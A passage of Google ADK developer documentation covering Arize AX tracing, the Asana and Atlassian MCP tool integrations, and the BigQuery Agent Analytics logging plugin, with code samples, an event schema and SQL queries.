com.google.adk.tools.BaseTool; import com.google.common.collect.ImmutableList; ```text public class MyAgent { public static void main(String[] args) { // Assuming Tools class is defined as in the previous step ImmutableList tools = ImmutableList.builder() .add(Tools.integrationTool) .add(Tools.connectionsTool) .build(); // Finally, create your agent with the tools generated automatically. LlmAgent rootAgent = LlmAgent.builder() .name("science-teacher") .description("Science teacher agent") .model("gemini-2.0-flash") .instruction( "Help user, leverage the tools you have access to." ) .tools(tools) .build(); // You can now use rootAgent to interact with the LLM // For example, you can start a conversation with the agent. } } ```` ```` **Note:** To find the list of supported entities and actions for a connection, use these Connector APIs: `listActions`, `listEntityTypes`. ### 3. Expose your agent To configure `__init__.py` to expose your agent, use the following code: ```py from . import agent ```` ### 4. Use your agent To start the Google ADK Web UI and use your agent, use the following commands: ```shell # make sure to run `adk web` from your project_root_folder adk web ``` After completing the above steps, go to , and choose the `my_agent` agent (which is the same as the agent folder name). To start the Google ADK Web UI and use your agent, use the following commands: ```bash mvn install mvn exec:java \ -Dexec.mainClass="com.google.adk.web.AdkWebServer" \ -Dexec.args="--adk.agents.source-dir=src/main/java" \ -Dexec.classpathScope="compile" ``` After completing the above steps, go to , and choose the `my_agent` agent (which is the same as the agent folder name). # Arize AX observability for ADK [Arize AX](https://arize.com/docs/ax) is a production-grade observability platform for monitoring, debugging, and improving LLM applications and AI Agents at scale. It provides comprehensive tracing, evaluation, and monitoring capabilities for your Google ADK applications. To get started, sign up for a [free account](https://app.arize.com/auth/join). For an open-source, self-hosted alternative, check out [Phoenix](https://arize.com/docs/phoenix). ## Overview Arize AX can automatically collect traces from Google ADK using [OpenInference instrumentation](https://github.com/Arize-ai/openinference/tree/main/python/instrumentation/openinference-instrumentation-google-adk), allowing you to: - **Trace agent interactions** - Automatically capture every agent run, tool call, model request, and response with context and metadata - **Evaluate performance** - Assess agent behavior using custom or pre-built evaluators and run experiments to test agent configurations - **Monitor in production** - Set up real-time dashboards and alerts to track performance - **Debug issues** - Analyze detailed traces to quickly identify bottlenecks, failed tool calls, and any unexpected agent behavior ## Installation Install the required packages: ```bash pip install openinference-instrumentation-google-adk google-adk arize-otel ``` ## Setup ### 1. Configure Environment Variables Set your Google API key: ```bash export GOOGLE_API_KEY=[your_key_here] ``` ### 2. Connect your application to Arize AX ```python from arize.otel import register # Register with Arize AX tracer_provider = register( space_id="your-space-id", # Found in app space settings page api_key="your-api-key", # Found in app space settings page project_name="your-project-name" # Name this whatever you prefer ) # Import and configure the automatic instrumentor from OpenInference from openinference.instrumentation.google_adk import GoogleADKInstrumentor # Finish automatic instrumentation GoogleADKInstrumentor().instrument(tracer_provider=tracer_provider) ``` ## Observe Now that you have tracing setup, all Google ADK SDK requests will be streamed to Arize AX for observability and evaluation. ```python import nest_asyncio nest_asyncio.apply() from google.adk.agents import Agent from google.adk.runners import InMemoryRunner from google.genai import types # Define a tool function def get_weather(city: str) -> dict: """Retrieves the current weather report for a specified city. Args: city (str): The name of the city for which to retrieve the weather report. Returns: dict: status and result or error msg. """ if city.lower() == "new york": return { "status": "success", "report": ( "The weather in New York is sunny with a temperature of 25 degrees" " Celsius (77 degrees Fahrenheit)." ), } else: return { "status": "error", "error_message": f"Weather information for '{city}' is not available.", } # Create an agent with tools agent = Agent( name="weather_agent", model="gemini-2.0-flash-exp", description="Agent to answer questions using weather tools.", instruction="You must use the available tools to find an answer.", tools=[get_weather] ) app_name = "weather_app" user_id = "test_user" session_id = "test_session" runner = InMemoryRunner(agent=agent, app_name=app_name) session_service = runner.session_service await session_service.create_session( app_name=app_name, user_id=user_id, session_id=session_id ) # Run the agent (all interactions will be traced) async for event in runner.run_async( user_id=user_id, session_id=session_id, new_message=types.Content(role="user", parts=[ types.Part(text="What is the weather in New York?")] ) ): if event.is_final_response(): print(event.content.parts[0].text.strip()) ``` ## View Results in Arize AX ## Support and Resources - [Arize AX Documentation](https://arize.com/docs/ax/integrations/frameworks-and-platforms/google-adk) - [Arize Community Slack](https://arize-ai.slack.com/join/shared_invite/zt-11t1vbu4x-xkBIHmOREQnYnYDH1GDfCg#/shared-invite/email) - [OpenInference Package](https://github.com/Arize-ai/openinference/tree/main/python/instrumentation/openinference-instrumentation-google-adk) # Asana MCP tool for ADK Supported in ADKPythonTypeScript The [Asana MCP Server](https://developers.asana.com/docs/using-asanas-mcp-server) connects your ADK agent to the [Asana](https://asana.com/) work management platform. This integration gives your agent the ability to manage projects, tasks, goals, and team collaboration using natural language. ## Use cases - **Track Project Status**: Get real-time updates on project progress, view status reports, and retrieve information about milestones and deadlines. - **Manage Tasks**: Create, update, and organize tasks using natural language. Let your agent handle task assignments, status changes, and priority updates. - **Monitor Goals**: Access and update Asana Goals to track team objectives and key results across your organization. ## Prerequisites - An [Asana](https://asana.com/) account with access to a workspace ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters root_agent = Agent( model="gemini-2.5-pro", name="asana_agent", instruction="Help users manage projects, tasks, and goals in Asana", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="npx", args=[ "-y", "mcp-remote", "https://mcp.asana.com/sse", ] ), timeout=30, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "asana_agent", instruction: "Help users manage projects, tasks, and goals in Asana", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: [ "-y", "mcp-remote", "https://mcp.asana.com/sse", ], }, }), ], }); export { rootAgent }; ``` Note When you run this agent for the first time, a browser window opens automatically to request access via OAuth. Alternatively, you can use the authorization URL printed in the console. You must approve this request to allow the agent to access your Asana data. ## Available tools Asana's MCP server includes 30+ tools organized by category. Tools are automatically discovered when your agent connects. Use the [ADK Web UI](/adk-docs/runtime/web-interface/) to view available tools in the trace graph after running your agent. | Category | Description | | ----------------- | ------------------------------------------- | | Project tracking | Get project status updates and reports | | Task management | Create, update, and organize tasks | | User information | Access user details and assignments | | Goals | Track and update Asana Goals | | Team organization | Manage team structures and membership | | Object search | Quick typeahead search across Asana objects | ## Additional resources - [Asana MCP Server Documentation](https://developers.asana.com/docs/using-asanas-mcp-server) - [Asana MCP Integration Guide](https://developers.asana.com/docs/integrating-with-asanas-mcp-server) # Atlassian MCP tool for ADK Supported in ADKPythonTypeScript The [Atlassian MCP Server](https://github.com/atlassian/atlassian-mcp-server) connects your ADK agent to the [Atlassian](https://www.atlassian.com/) ecosystem, bridging the gap between project tracking in Jira and knowledge management in Confluence. This integration gives your agent the ability to manage issues, search and update documentation pages, and streamline collaboration workflows using natural language. ## Use cases - **Unified Knowledge Search**: Search across both Jira issues and Confluence pages simultaneously to find project specs, decisions, or historical context. - **Automate Issue Management**: Create, edit, and transition Jira issues, or add comments to existing tickets. - **Documentation Assistant**: Retrieve page content, generate drafts, or add inline comments to Confluence documents directly from your agent. ## Prerequisites - Sign up for an [Atlassian account](https://id.atlassian.com/signup) - An Atlassian Cloud site with Jira and/or Confluence ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters root_agent = Agent( model="gemini-2.5-pro", name="atlassian_agent", instruction="Help users work with data in Atlassian products", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="npx", args=[ "-y", "mcp-remote", "https://mcp.atlassian.com/v1/mcp", ] ), timeout=30, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "atlassian_agent", instruction: "Help users work with data in Atlassian products", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "npx", args: [ "-y", "mcp-remote", "https://mcp.atlassian.com/v1/mcp", ], }, }), ], }); export { rootAgent }; ``` Note When you run this agent for the first time, a browser window opens automatically to request access via OAuth. Alternatively, you can use the authorization URL printed in the console. You must approve this request to allow the agent to access your Atlassian data. ## Available tools | Tool | Description | | ---------------------------------- | ---------------------------------------------------------- | | `atlassianUserInfo` | Get information about the user | | `getAccessibleAtlassianResources` | Get information about accessible Atlassian resources | | `getJiraIssue` | Get information about a Jira issue | | `editJiraIssue` | Edit a Jira issue | | `createJiraIssue` | Create a new Jira issue | | `getTransitionsForJiraIssue` | Get transitions for a Jira issue | | `transitionJiraIssue` | Transition a Jira issue | | `lookupJiraAccountId` | Lookup a Jira account ID | | `searchJiraIssuesUsingJql` | Search Jira issues using JQL | | `addCommentToJiraIssue` | Add a comment to a Jira issue | | `getJiraIssueRemoteIssueLinks` | Get remote issue links for a Jira issue | | `getVisibleJiraProjects` | Get visible Jira projects | | `getJiraProjectIssueTypesMetadata` | Get issue types metadata for a Jira project | | `getJiraIssueTypeMetaWithFields` | Get issue type metadata with fields for a Jira issue | | `getConfluenceSpaces` | Get information about Confluence spaces | | `getConfluencePage` | Get information about a Confluence page | | `getPagesInConfluenceSpace` | Get information about pages in a Confluence space | | `getConfluencePageFooterComments` | Get information about footer comments in a Confluence page | | `getConfluencePageInlineComments` | Get information about inline comments in a Confluence page | | `getConfluencePageDescendants` | Get information about descendants of a Confluence page | | `createConfluencePage` | Create a new Confluence page | | `updateConfluencePage` | Update an existing Confluence page | | `createConfluenceFooterComment` | Create a footer comment in a Confluence page | | `createConfluenceInlineComment` | Create an inline comment in a Confluence page | | `searchConfluenceUsingCql` | Search Confluence using CQL | | `search` | Search for information | | `fetch` | Fetch information | ## Additional resources - [Atlassian MCP Server Repository](https://github.com/atlassian/atlassian-mcp-server) - [Atlassian MCP Server Documentation](https://support.atlassian.com/atlassian-rovo-mcp-server/docs/getting-started-with-the-atlassian-remote-mcp-server/) # BigQuery Agent Analytics plugin for ADK Supported in ADKPython v1.21.0Preview Version Requirement Use ADK Python version 1.21.0 or higher to make full use of the features described in this document. The BigQuery Agent Analytics Plugin significantly enhances the Agent Development Kit (ADK) by providing a robust solution for in-depth agent behavior analysis. Using the ADK Plugin architecture and the **BigQuery Storage Write API**, it captures and logs critical operational events directly into a Google BigQuery table, empowering you with advanced capabilities for debugging, real-time monitoring, and comprehensive offline performance evaluation. Version 1.21.0 introduces **Hybrid Multimodal Logging**, allowing you to log large payloads (images, audio, blobs) by offloading them to Google Cloud Storage (GCS) while keeping a structured reference (`ObjectRef`) in BigQuery. Preview release The BigQuery Agent Analytics Plugin is in Preview release. For more information, see the [launch stage descriptions](https://cloud.google.com/products#product-launch-stages). BigQuery Storage Write API This feature uses **BigQuery Storage Write API**, which is a paid service. For information on costs, see the [BigQuery documentation](https://cloud.google.com/bigquery/pricing?e=48754805&hl=en#data-ingestion-pricing). ## Use cases - **Agent workflow debugging and analysis:** Capture a wide range of *plugin lifecycle events* (LLM calls, tool usage) and *agent-yielded events* (user input, model responses), into a well-defined schema. - **High-volume analysis and debugging:** Logging operations are performed asynchronously using the Storage Write API to allow high throughput and low latency. - **Multimodal Analysis**: Log and analyze text, images, and other modalities. Large files are offloaded to GCS, making them accessible to BigQuery ML via Object Tables. - **Distributed Tracing**: Built-in support for OpenTelemetry-style tracing (`trace_id`, `span_id`) to visualize agent execution flows. The agent event data recorded varies based on the ADK event type. For more information, see [Event types and payloads](#event-types). ## Prerequisites - **Google Cloud Project** with the **BigQuery API** enabled. - **BigQuery Dataset:** Create a dataset to store logging tables before using the plugin. The plugin automatically creates the necessary events table within the dataset if the table does not exist. - **Google Cloud Storage Bucket (Optional):** If you plan to log multimodal content (images, audio, etc.), creating a GCS bucket is recommended for offloading large files. - **Authentication:** - **Local:** Run `gcloud auth application-default login`. - **Cloud:** Ensure your service account has the required permissions. ### IAM permissions For the agent to work properly, the principal (e.g., service account, user account) under which the agent is running needs these Google Cloud roles: * `roles/bigquery.jobUser` at Project Level to run BigQuery queries. * `roles/bigquery.dataEditor` at Table Level to write log/event data. * **If using GCS offloading:** `roles/storage.objectCreator` and `roles/storage.objectViewer` on the target bucket. ## Use with agent You use the BigQuery Agent Analytics Plugin by configuring and registering it with your ADK agent's App object. The following example shows an implementation of an agent with this plugin, including GCS offloading: my_bq_agent/agent.py ```python # my_bq_agent/agent.py import os import google.auth from google.adk.apps import App from google.adk.plugins.bigquery_agent_analytics_plugin import BigQueryAgentAnalyticsPlugin, BigQueryLoggerConfig from google.adk.agents import Agent from google.adk.models.google_llm import Gemini from google.adk.tools.bigquery import BigQueryToolset, BigQueryCredentialsConfig # --- OpenTelemetry Initialization (Optional) --- # Recommended for enabling distributed tracing (populates trace_id, span_id). # If not configured, the plugin uses internal UUIDs for span correlation. try: from opentelemetry import trace from opentelemetry.sdk.trace import TracerProvider trace.set_tracer_provider(TracerProvider()) except ImportError: pass # OpenTelemetry is optional # --- Configuration --- PROJECT_ID = os.environ.get("GOOGLE_CLOUD_PROJECT", "your-gcp-project-id") DATASET_ID = os.environ.get("BIG_QUERY_DATASET_ID", "your-big-query-dataset-id") LOCATION = os.environ.get("GOOGLE_CLOUD_LOCATION", "US") # default location is US in the plugin GCS_BUCKET = os.environ.get("GCS_BUCKET_NAME", "your-gcs-bucket-name") # Optional if PROJECT_ID == "your-gcp-project-id": raise ValueError("Please set GOOGLE_CLOUD_PROJECT or update the code.") # --- CRITICAL: Set environment variables BEFORE Gemini instantiation --- os.environ['GOOGLE_CLOUD_PROJECT'] = PROJECT_ID os.environ['GOOGLE_CLOUD_LOCATION'] = LOCATION os.environ['GOOGLE_GENAI_USE_VERTEXAI'] = 'True' # --- Initialize the Plugin with Config --- bq_config = BigQueryLoggerConfig( enabled=True, gcs_bucket_name=GCS_BUCKET, # Enable GCS offloading for multimodal content log_multi_modal_content=True, max_content_length=500 * 1024, # 500 KB limit for inline text batch_size=1, # Default is 1 for low latency, increase for high throughput shutdown_timeout=10.0 ) bq_logging_plugin = BigQueryAgentAnalyticsPlugin( project_id=PROJECT_ID, dataset_id=DATASET_ID, table_id="agent_events_v2", # default table name is agent_events_v2 config=bq_config, location=LOCATION ) # --- Initialize Tools and Model --- credentials, _ = google.auth.default(scopes=["https://www.googleapis.com/auth/cloud-platform"]) bigquery_toolset = BigQueryToolset( credentials_config=BigQueryCredentialsConfig(credentials=credentials) ) llm = Gemini(model="gemini-2.5-flash") root_agent = Agent( model=llm, name='my_bq_agent', instruction="You are a helpful assistant with access to BigQuery tools.", tools=[bigquery_toolset] ) # --- Create the App --- app = App( name="my_bq_agent", root_agent=root_agent, plugins=[bq_logging_plugin], ) ``` ### Run and test agent Test the plugin by running the agent and making a few requests through the chat interface, such as ”tell me what you can do” or "List datasets in my cloud project “. These actions create events which are recorded in your Google Cloud project BigQuery instance. Once these events have been processed, you can view the data for them in the [BigQuery Console](https://console.cloud.google.com/bigquery), using this query ```sql SELECT timestamp, event_type, content FROM `your-gcp-project-id.your-big-query-dataset-id.agent_events_v2` ORDER BY timestamp DESC LIMIT 20; ``` ## Tracing and Observability The plugin supports **OpenTelemetry** for distributed tracing. - **Automatic Span Management**: The plugin automatically generates spans for Agent execution, LLM calls, and Tool executions. - **OpenTelemetry Integration**: If an OpenTelemetry `TracerProvider` is configured (as shown in the example above), the plugin will use valid OTel spans, populating `trace_id`, `span_id`, and `parent_span_id` with standard OTel identifiers. This allows you to correlate agent logs with other services in your distributed system. - **Fallback Mechanism**: If OpenTelemetry is not installed or configured, the plugin automatically falls back to generating internal UUIDs for spans and uses the `invocation_id` as the trace ID. This ensures that the parent-child hierarchy (Agent -> Span -> Tool/LLM) is *always* preserved in the BigQuery logs, even without a full OTel setup. ## Configuration options You can customize the plugin using `BigQueryLoggerConfig`. - **`enabled`** (`bool`, default: `True`): To disable the plugin from logging agent data to the BigQuery table, set this parameter to False. - **`clustering_fields`** (`List[str]`, default: `["event_type", "agent", "user_id"]`): The fields used to cluster the BigQuery table when it is automatically created. - **`gcs_bucket_name`** (`Optional[str]`, default: `None`): The name of the GCS bucket to offload large content (images, blobs, large text) to. If not provided, large content may be truncated or replaced with placeholders. - **`connection_id`** (`Optional[str]`, default: `None`): The BigQuery connection ID (e.g., `us.my-connection`) to use as the authorizer for `ObjectRef` columns. Required for using `ObjectRef` with BigQuery ML. - **`max_content_length`** (`int`, default: `500 * 1024`): The maximum length (in characters) of text content to store **inline** in BigQuery before offloading to GCS (if configured) or truncating. Default is 500 KB. - **`batch_size`** (`int`, default: `1`): The number of events to batch before writing to BigQuery. - **`batch_flush_interval`** (`float`, default: `1.0`): The maximum time (in seconds) to wait before flushing a partial batch. - **`shutdown_timeout`** (`float`, default: `10.0`): Seconds to wait for logs to flush during shutdown. - **`event_allowlist`** (`Optional[List[str]]`, default: `None`): A list of event types to log. If `None`, all events are logged except those in `event_denylist`. For a comprehensive list of supported event types, refer to the [Event types and payloads](#event-types) section. - **`event_denylist`** (`Optional[List[str]]`, default: `None`): A list of event types to skip logging. For a comprehensive list of supported event types, refer to the [Event types and payloads](#event-types) section. - **`content_formatter`** (`Optional[Callable[[Any, str], Any]]`, default: `None`): An optional function to format event content before logging. - **`log_multi_modal_content`** (`bool`, default: `True`): Whether to log detailed content parts (including GCS references). - **`queue_max_size`** (`int`, default: `10000`): The maximum number of events to hold in the in-memory queue before dropping new events. - **`retry_config`** (`RetryConfig`, default: `RetryConfig()`): Configuration for retrying failed BigQuery writes (attributes: `max_retries`, `initial_delay`, `multiplier`, `max_delay`). - **`log_session_metadata`** (`bool`, default: `True`): If True, logs metadata from the `session` object (e.g., `session.metadata`) into the `attributes` column. - **`custom_tags`** (`Dict[str, Any]`, default: `{}`): A dictionary of static tags (e.g., `{"env": "prod", "version": "1.0"}`) to be included in the `attributes` column for every event. The following code sample shows how to define a configuration for the BigQuery Agent Analytics plugin: ```python import json import re from google.adk.plugins.bigquery_agent_analytics_plugin import BigQueryLoggerConfig def redact_dollar_amounts(event_content: Any) -> str: """ Custom formatter to redact dollar amounts (e.g., $600, $12.50) and ensure JSON output if the input is a dict. """ text_content = "" if isinstance(event_content, dict): text_content = json.dumps(event_content) else: text_content = str(event_content) # Regex to find dollar amounts: $ followed by digits, optionally with commas or decimals. # Examples: $600, $1,200.50, $0.99 redacted_content = re.sub(r'\$\d+(?:,\d{3})*(?:\.\d+)?', 'xxx', text_content) return redacted_content config = BigQueryLoggerConfig( enabled=True, event_allowlist=["LLM_REQUEST", "LLM_RESPONSE"], # Only log these events # event_denylist=["TOOL_STARTING"], # Skip these events shutdown_timeout=10.0, # Wait up to 10s for logs to flush on exit client_close_timeout=2.0, # Wait up to 2s for BQ client to close max_content_length=500, # Truncate content to 500 chars content_formatter=redact_dollar_amounts, # Redact the dollar amounts in the logging content queue_max_size=10000, # Max events to hold in memory # retry_config=RetryConfig(max_retries=3), # Optional: Configure retries ) plugin = BigQueryAgentAnalyticsPlugin(..., config=config) ``` ## Schema and production setup ### Schema Reference The events table (`agent_events_v2`) uses a flexible schema. The following table provides a comprehensive reference with example values. | Field Name | Type | Mode | Description | Example Value | | ------------------ | ----------- | ---------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------- | | **timestamp** | `TIMESTAMP` | `REQUIRED` | UTC timestamp of event creation. Acts as the primary ordering key and often the daily partitioning key. Precision is microsecond. | `2026-02-03 20:52:17 UTC` | | **event_type** | `STRING` | `NULLABLE` | The canonical event category. Standard values include `LLM_REQUEST`, `LLM_RESPONSE`, `TOOL_STARTING`, `TOOL_COMPLETED`, `AGENT_STARTING`, `AGENT_COMPLETED`, `STATE_DELTA`. Used for high-level filtering. | `LLM_REQUEST` | | **agent** | `STRING` | `NULLABLE` | The name of the agent responsible for this event. Defined during agent initialization or via the `root_agent_name` context. | `my_bq_agent` | | **session_id** | `STRING` | `NULLABLE` | A persistent identifier for the entire conversation thread. Stays constant across multiple turns and sub-agent calls. | `04275a01-1649-4a30-b6a7-5b443c69a7bc` | | **invocation_id** | `STRING` | `NULLABLE` | The unique identifier for a single execution turn or request cycle. Corresponds to `trace_id` in many contexts. | `e-b55b2000-68c6-4e8b-b3b3-ffb454a92e40` | | **user_id** | `STRING` | `NULLABLE` | The identifier of the user (human or system) initiating the session. Extracted from the `User` object or metadata. | `test_user` | | **trace_id** | `STRING` | `NULLABLE` | The **OpenTelemetry** Trace ID (32-char hex). Links all operations within a single distributed request lifecycle. | `e-b55b2000-68c6-4e8b-b3b3-ffb454a92e40` | | **span_id** | `STRING` | `NULLABLE` | The **OpenTelemetry** Span ID (16-char hex). Uniquely identifies this specific atomic operation. | `69867a836cd94798be2759d8e0d70215` | | **parent_span_id** | `STRING` | `NULLABLE` | The Span ID of the immediate caller. Used to reconstruct the parent-child execution tree (DAG). | `ef5843fe40764b4b8afec44e78044205` | | **content** | `JSON` | `NULLABLE` | The primary event payload. Structure is polymorphic based on `event_type`. | `{"system_prompt": "You are...", "prompt": [{"role": "user", "content": "hello"}], "response": "Hi", "usage": {"total": 15}}` | | **attributes** | `JSON` | `NULLABLE` | Metadata/Enrichment (usage stats, model info, custom tags). | `{"model": "gemini-2.5-flash", "usage_metadata": {"total_token_count": 15}, "state_delta": {"key": "val"}, "session_metadata": {"key": "val"}}` | | **latency_ms** | `JSON` | `NULLABLE` | Performance metrics. Standard keys are `total_ms` (wall-clock duration) and `time_to_first_token_ms` (streaming latency). | `{"total_ms": 1250, "time_to_first_token_ms": 450}` | | **status** | `STRING` | `NULLABLE` | High-level outcome. Values: `OK` (success) or `ERROR` (failure). | `OK` | | **error_message** | `STRING` | `NULLABLE` | Human-readable exception message or stack trace fragment. Populated only when `status` is `ERROR`. | `Error 404: Dataset not found` | | **is_truncated** | `BOOLEAN` | `NULLABLE` | `true` if `content` or `attributes` exceeded the BigQuery cell size limit (default 10MB) and were partially dropped. | `false` | | **content_parts** | `RECORD` | `REPEATED` | Array of multi-modal segments (Text, Image, Blob). Used when content cannot be serialized as simple JSON (e.g., large binaries or GCS refs). | `[{"mime_type": "text/plain", "text": "hello"}]` | The plugin automatically creates the table if it does not exist. However, for production, we recommend creating the table manually using the following DDL, which utilizes the **JSON** type for flexibility and **REPEATED RECORD**s for multimodal content. **Recommended DDL:** ```sql CREATE TABLE `your-gcp-project-id.adk_agent_logs.agent_events_v2` ( timestamp TIMESTAMP NOT NULL OPTIONS(description="The UTC time at which the event was logged."), event_type STRING OPTIONS(description="Indicates the type of event being logged (e.g., 'LLM_REQUEST', 'TOOL_COMPLETED')."), agent STRING OPTIONS(description="The name of the ADK agent or author associated with the event."), session_id STRING OPTIONS(description="A unique identifier to group events within a single conversation or user session."), invocation_id STRING OPTIONS(description="A unique identifier for each individual agent execution or turn within a session."), user_id STRING OPTIONS(description="The identifier of the user associated with the current session."), trace_id STRING OPTIONS(description="OpenTelemetry trace ID for distributed tracing."), span_id STRING OPTIONS(description="OpenTelemetry span ID for this specific operation."), parent_span_id STRING OPTIONS(description="OpenTelemetry parent span ID to reconstruct hierarchy."), content JSON OPTIONS(description="The event-specific data (payload) stored as JSON."), content_parts ARRAY, text STRING, part_index INT64, part_attributes STRING, storage_mode STRING >> OPTIONS(description="Detailed content parts for multi-modal data."), attributes JSON OPTIONS(description="Arbitrary key-value pairs for additional metadata (e.g., 'root_agent_name', 'model_version', 'usage_metadata', 'session_metadata', 'custom_tags')."), latency_ms JSON OPTIONS(description="Latency measurements (e.g., total_ms)."), status STRING OPTIONS(description="The outcome of the event, typically 'OK' or 'ERROR'."), error_message STRING OPTIONS(description="Populated if an error occurs."), is_truncated BOOLEAN OPTIONS(description="Flag indicates if content was truncated.") ) PARTITION BY DATE(timestamp) CLUSTER BY event_type, agent, user_id; ``` ### Event types and payloads The `content` column now contains a **JSON** object specific to the `event_type`. The `content_parts` column provides a structured view of the content, especially useful for images or offloaded data. Content Truncation - Variable content fields are truncated to `max_content_length` (configured in `BigQueryLoggerConfig`, default 500KB). - If `gcs_bucket_name` is configured, large content is offloaded to GCS instead of being truncated, and a reference is stored in `content_parts.object_ref`. #### LLM interactions (plugin lifecycle) These events track the raw requests sent to and responses received from the LLM. **1. LLM_REQUEST** Captures the prompt sent to the model, including conversation history and system instructions. ```json { "event_type": "LLM_REQUEST", "content": { "system_prompt": "You are a helpful assistant...", "prompt": [ { "role": "user", "content": "hello how are you today" } ] }, "attributes": { "model": "gemini-2.5-flash", "llm_config": { "temperature": 0.5, "top_p": 0.9 } } } ``` **2. LLM_RESPONSE** Captures the model's output and token usage statistics. ```json { "event_type": "LLM_RESPONSE", "content": { "response": "text: 'Hello! I'm doing well...'", "usage": { "completion": 19, "prompt": 10129, "total": 10148 } }, "attributes": { "usage_metadata": { "prompt_token_count": 10129, "candidates_token_count": 19, "total_token_count": 10148 } }, "latency_ms": { "time_to_first_token_ms": 2579, "total_ms": 2579 } } ``` #### Tool usage (plugin lifecycle) These events track the execution of tools by the agent. **3. TOOL_STARTING** Logged when an agent begins executing a tool. ```json { "event_type": "TOOL_STARTING", "content": { "tool": "list_dataset_ids", "args": { "project_id": "bigquery-public-data" } } } ``` **4. TOOL_COMPLETED** Logged when a tool execution finishes. ```json { "event_type": "TOOL_COMPLETED", "content": { "tool": "list_dataset_ids", "result": [ "austin_311", "austin_bikeshare" ] }, "latency_ms": { "total_ms": 467 } } ``` #### State Management These events track changes to the agent's state, typically triggered by tools. **5. STATE_DELTA** Tracks changes to the agent's internal state (e.g., token cache updates). ```json { "event_type": "STATE_DELTA", "attributes": { "state_delta": { "bigquery_token_cache": "{\"token\": \"ya29...\", \"expiry\": \"...\"}" } } } ``` #### Agent lifecycle & Generic Events | **Event Type** | **Content (JSON) Structure** | | ----------------------- | -------------------------------------------- | | `INVOCATION_STARTING` | `{}` | | `INVOCATION_COMPLETED` | `{}` | | `AGENT_STARTING` | `"You are a helpful agent..."` | | `AGENT_COMPLETED` | `{}` | | `USER_MESSAGE_RECEIVED` | `{"text_summary": "Help me book a flight."}` | #### GCS Offloading Examples (Multimodal & Large Text) When `gcs_bucket_name` is configured, large text and multimodal content (images, audio, etc.) are automatically offloaded to GCS. The `content` column will contain a summary or placeholder, while `content_parts` contains the `object_ref` pointing to the GCS URI. **Offloaded Text Example** ```json { "event_type": "LLM_REQUEST", "content_parts": [ { "part_index": 1, "mime_type": "text/plain", "storage_mode": "GCS_REFERENCE", "text": "AAAA... [OFFLOADED]", "object_ref": { "uri": "gs://haiyuan-adk-debug-verification-1765319132/2025-12-10/e-f9545d6d/ae5235e6_p1.txt", "authorizer": "us.bqml_connection", "details": {"gcs_metadata": {"content_type": "text/plain"}} } } ] } ``` **Offloaded Image Example** ```json { "event_type": "LLM_REQUEST", "content_parts": [ { "part_index": 2, "mime_type": "image/png", "storage_mode": "GCS_REFERENCE", "text": "[MEDIA OFFLOADED]", "object_ref": { "uri": "gs://haiyuan-adk-debug-verification-1765319132/2025-12-10/e-f9545d6d/ae5235e6_p2.png", "authorizer": "us.bqml_connection", "details": {"gcs_metadata": {"content_type": "image/png"}} } } ] } ``` **Querying Offloaded Content (Get Signed URLs)** ```sql SELECT timestamp, event_type, part.mime_type, part.storage_mode, part.object_ref.uri AS gcs_uri, -- Generate a signed URL to read the content directly (requires connection_id configuration) STRING(OBJ.GET_ACCESS_URL(part.object_ref, 'r').access_urls.read_url) AS signed_url FROM `your-gcp-project-id.your-dataset-id.agent_events_v2`, UNNEST(content_parts) AS part WHERE part.storage_mode = 'GCS_REFERENCE' ORDER BY timestamp DESC LIMIT 10; ``` ## Advanced analysis queries **Trace a specific conversation turn using trace_id** ```sql SELECT timestamp, event_type, agent, JSON_VALUE(content, '$.response') as summary FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` WHERE trace_id = 'your-trace-id' ORDER BY timestamp ASC; ``` **Token usage analysis (accessing JSON fields)** ```sql SELECT AVG(CAST(JSON_VALUE(content, '$.usage.total') AS INT64)) as avg_tokens FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` WHERE event_type = 'LLM_RESPONSE'; ``` **Querying Multimodal Content (using content_parts and ObjectRef)** ```sql SELECT timestamp, part.mime_type, part.object_ref.uri as gcs_uri FROM `your-gcp-project-id.your-dataset-id.agent_events_v2`, UNNEST(content_parts) as part WHERE part.mime_type LIKE 'image/%' ORDER BY timestamp DESC; ``` **Analyze Multimodal Content with BigQuery Remote Model (Gemini)** ```sql SELECT logs.session_id, -- Get a signed URL for the image STRING(OBJ.GET_ACCESS_URL(parts.object_ref, "r").access_urls.read_url) as signed_url, -- Analyze the image using a remote model (e.g., gemini-pro-vision) AI.GENERATE( ('Describe this image briefly. What company logo?', parts.object_ref) ) AS generated_result FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` logs, UNNEST(logs.content_parts) AS parts WHERE parts.mime_type LIKE 'image/%' ORDER BY logs.timestamp DESC LIMIT 1; ``` **Latency Analysis (LLM & Tools)** ```sql SELECT event_type, AVG(CAST(JSON_VALUE(latency_ms, '$.total_ms') AS INT64)) as avg_latency_ms FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` WHERE event_type IN ('LLM_RESPONSE', 'TOOL_COMPLETED') GROUP BY event_type; ``` **Span Hierarchy & Duration Analysis** ```sql SELECT span_id, parent_span_id, event_type, timestamp, -- Extract duration from latency_ms for completed operations CAST(JSON_VALUE(latency_ms, '$.total_ms') AS INT64) as duration_ms, -- Identify the specific tool or operation COALESCE( JSON_VALUE(content, '$.tool'), 'LLM_CALL' ) as operation FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` WHERE trace_id = 'your-trace-id' AND event_type IN ('LLM_RESPONSE', 'TOOL_COMPLETED') ORDER BY timestamp ASC; ``` ### 7. AI-Powered Root Cause Analysis (Agent Ops) Automatically analyze failed sessions to determine the root cause of errors using BigQuery ML and Gemini. ```sql DECLARE 